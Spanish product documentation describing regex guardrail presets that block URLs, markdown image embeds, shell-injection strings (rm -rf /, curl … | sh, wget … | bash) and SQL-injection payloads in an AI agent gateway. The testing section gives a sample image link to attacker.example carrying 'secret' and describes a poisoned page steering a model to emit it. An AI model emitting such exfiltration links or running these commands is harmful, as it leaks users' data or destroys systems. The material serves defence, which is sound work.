Guardrails agénticos

Cuando un modelo maneja herramientas, las cadenas peligrosas se esconden a plena vista en el contenido: una URL que el agente está a punto de obtener, una imagen markdown que el cliente auto-cargará, un rm -rf / que el modelo repite en una herramienta de shell, un UNION SELECT que emite para que un ejecutor SQL lo ejecute. Una política de contenido que solo piensa en PII o secretos pierde los cuatro. La categoría de presets Agent existe exactamente para esta forma — reglas regex deterministas que bloquean la solicitud o respuesta antes de que una herramienta downstream actúe sobre ella. Este es un aterrizaje enfocado para el caso de uso agéntico. Para el motor de guardrails completo — cada tipo de regla, campo, etapa y ruta — ver la referencia de Guardrails.

1. Por qué los guardrails de agente son una superficie distinta

Un guardrail examina contenido — el texto en la solicitud y el texto en la respuesta. Para un agente, ese texto se convierte en una acción: la URL se obtiene, el markdown se renderiza, la línea de shell se ejecuta, el SQL se ejecuta. Así que el mismo motor block / mask que usas para PII hace doble trabajo aquí — detiene un payload en el gateway antes de que la capa de herramientas del agente pueda convertirlo en un efecto secundario. La categoría Agent viene con cuatro presets, cada uno una regla regex con acción block, repartidos entre las dos etapas:

URL Filter — input, block

Bloquea cualquier URL http(s) en la solicitud. Úsalo para flujos de agente donde las URLs salientes deben estar en allowlist en vez de abiertas. El patrón sembrado coincide con cualquier URL; edita el regex para permitir dominios específicos.

Markdown Image Block — output, block

Bloquea incrustaciones de imagen markdown (![alt](url)) en la respuesta del modelo. Defiende contra la exfiltración por renderizado de imagen en clientes que auto-cargan imágenes remotas — un canal clásico de fuga de datos donde una URL de imagen renderizada cuela datos hacia afuera.

Tool Call Shell Block — input, block

Bloquea patrones obvios de inyección de shell en la solicitud (rm -rf /, curl … | sh, wget … | bash, escalación sudo). Úsalo para flujos de agente que puedan reenviar entrada del usuario a una herramienta de shell.

SQL Injection in Output — output, block

Bloquea respuestas del modelo que lleven payloads clásicos de inyección SQL (UNION SELECT, OR 1=1, DROP TABLE, terminadores de comentario). Defensa en profundidad para herramientas que auto-ejecutan SQL que el modelo produjo.

Dos presets examinan la entrada, dos examinan la salida. URL Filter y Tool Call Shell Block se disparan en la solicitud — antes de que el modelo se ejecute, antes de que se mida cualquier cuota. Markdown Image Block y SQL Injection in Output se disparan en la respuesta — después de que el modelo responde, antes de que el contenido llegue a tu cliente o su capa de herramientas. Saber en qué etapa vive un riesgo es todo el juego; ver Etapa de entrada y Etapa de salida.

2. Aplica un guardrail de agente en la consola

Cada paso aquí es una acción de consola sobre el gateway alojado bajo tu propia sesión. Crear y editar guardrails requiere Developer+ en el espacio de trabajo. Solo la llamada final /v1/* usa una clave de relay sk-orca-... — el guardrail en sí se configura completamente en la consola.

Abre la plantilla

En la consola, abre Guardrails, haz clic en el botón dividido New guardrail y elige un preset de la categoría de plantillas Agent — p. ej. Markdown Image Block. Crea la sola regla de bloqueo regex en la etapa correcta.

Nombra y guarda

Dale un nombre (≤ 64 caracteres), p. ej. agent-rails, y guarda. Un preset es una semilla, no un candado — añade las otras tres reglas Agent o edita el regex libremente después (ver §4).

Pruébalo en el sandbox

Abre la pestaña Test dentro del editor, pega una muestra, elige la etapa correspondiente y ejecuta la política actual localmente — sin llamada upstream, sin cuota (ver §3).

Vincula una clave

Edita una clave API y elige agent-rails del desplegable Guardrail (establece guardrail_id en la clave), o márcalo como valor por defecto del espacio de trabajo. Ver Vincular a una clave y Valor por defecto de cuenta.

3. Pruébalo antes de vincular

Prueba que la regla se dispara antes de que cualquier clave la apunte. Abre la pestaña Test, elige la etapa output y pega una respuesta que una página envenenada por un atacante podría haber engatusado al modelo para que emitiera:

Here is the result: ![status](https://attacker.example/track?d=secret)

El sandbox evalúa la política actual localmente — nada se envía upstream, nada se mide — y devuelve el veredicto block nombrando la regla que se disparó. Para una rejilla A/B contra un corpus de muestras adversariales y benignas, el arnés de Eval vive una pestaña al lado.

4. Compón y afina las reglas

Los cuatro presets son semillas. El movimiento común es combinarlos en un solo guardrail agent-rails y ajustar cada regex a tu stack:

Allowlist de URLs

Empieza desde URL Filter, luego edita el regex para que bloquee cada URL excepto tus dominios sancionados — invierte la coincidencia a una allowlist en vez de un bloqueo general.

Crea tus propios detectores

Añade una regla regex para cualquier forma de payload que les importe a tus herramientas — patrones RE2, tiempo lineal, sin backreferences. Los patrones compilan una vez y se cachean entre solicitudes.

Mezcla reglas Agent con el resto del motor en un guardrail. Emparéjalas con una regla mask de PII Shield o un bloqueo de entrada de Secrets Blocker — una política puede llevar cada tipo de regla y el motor las pliega en un solo veredicto. Ver Acciones para block vs. mask vs. flag.

5. Cómo se ve un bloqueo

Cada preset Agent usa la acción block. Una solicitud bloqueada devuelve HTTP 400 con el código de error guardrail_blocked y un mensaje que nombra el guardrail y la regla que se disparó:

{
  "error": {
    "code": "guardrail_blocked",
    "message": "request blocked by guardrail \"agent-rails\""
  }
}

Una solicitud bloqueada no cuesta cuota — un bloqueo en la etapa de entrada (URL Filter, Tool Call Shell Block) se dispara antes de la medición; un bloqueo en la etapa de salida (Markdown Image Block, SQL Injection in Output) reembolsa la cuota preconsumida después de que la respuesta es rechazada — y se marca como skip-retry, ya que reejecutar el mismo prompt simplemente volvería a bloquear. Ver el error guardrail_blocked.

El block de salida se aplica también en streaming. Para los dos presets Agent de la etapa de salida, block se sostiene en ambos sentidos: en una respuesta sin streaming la respuesta se examina antes de regresar, y en una respuesta con streaming un escáner corta el stream en pleno vuelo antes de que cualquier contenido bloqueado llegue al cliente. Ver Cobertura de streaming.

6. Los guardrails son contenido; el firewall son llamadas a herramienta

Los guardrails de agente son una primera capa fuerte, pero razonan sobre cadenas, no sobre semántica de herramientas. Bloquean una línea de shell en el contenido — no entienden que el modelo emitió un tool_call estructurado a una herramienta destructiva, o que una solicitud saliente se dirige a una IP de metadatos. Esa capa de llamada a herramienta es el Firewall: evalúa los tool_calls emitidos por el modelo, las tools/call de MCP y el egress saliente con veredictos como allow / audit / deny / pending_approval. Los dos se componen — los guardrails examinan el texto, el firewall gobierna la acción.

Firewall

Gobierna las llamadas a herramienta emitidas por el modelo, las llamadas MCP y el egress con veredictos allow / audit / deny / approval.

Guardrails vs. Firewall

Cuándo recurrir a un guardrail de contenido vs. un firewall de llamada a herramienta — y cómo ejecutar ambos.

Asegurar agentes de IA

La pila de controles de agente completa: contenido, herramientas, MCP y egress.

Agencia excesiva

La amenaza que estos rieles abordan — un agente que hace más de lo que debería.

7. Ve qué se disparó

Cada regla que se dispara registra una coincidencia — tipo de regla, acción, etapa y una cadena de detalle — que aparece en el feed Matches del espacio de trabajo. La propia subcadena coincidente se registra solo cuando Log raw content está activado, que está apagado por defecto. Agrupa y filtra el feed por guardrail, tipo de regla y acción para observar la tasa de impacto de tus reglas de agente y afinar falsos positivos. Ver Feed de coincidencias, Registro y privacidad y Afinar falsos positivos.

8. Dónde ir a continuación

Reglas de la etapa de salida

Cómo funciona el examen de respuesta para Markdown Image Block y SQL Injection in Output.

Detectores regex

Crea tus propios patrones RE2 para extender las reglas Agent.

Exfiltración de datos

El canal de exfil que cierra Markdown Image Block.

Llamadas a herramienta peligrosas

Por qué un riel de contenido por sí solo no es suficiente — emparéjalo con el firewall.

Los guardrails de agente mantienen las cadenas peligrosas fuera del contenido que un agente envía y recibe. Para gobernar las acciones que un agente toma — las llamadas a herramienta, llamadas MCP y el egress en sí — sube al Firewall y lee la línea base de asegurar agentes de IA. Para el motor de guardrails completo, ver la referencia de Guardrails.

​1. Por qué los guardrails de agente son una superficie distinta

​2. Aplica un guardrail de agente en la consola

​3. Pruébalo antes de vincular

​4. Compón y afina las reglas

Allowlist de URLs

Crea tus propios detectores

​5. Cómo se ve un bloqueo

​6. Los guardrails son contenido; el firewall son llamadas a herramienta

Firewall

Guardrails vs. Firewall

Asegurar agentes de IA

Agencia excesiva

​7. Ve qué se disparó

​8. Dónde ir a continuación

Reglas de la etapa de salida

Detectores regex

Exfiltración de datos

Llamadas a herramienta peligrosas

1. Por qué los guardrails de agente son una superficie distinta

2. Aplica un guardrail de agente en la consola

3. Pruébalo antes de vincular

4. Compón y afina las reglas

5. Cómo se ve un bloqueo

6. Los guardrails son contenido; el firewall son llamadas a herramienta

7. Ve qué se disparó

8. Dónde ir a continuación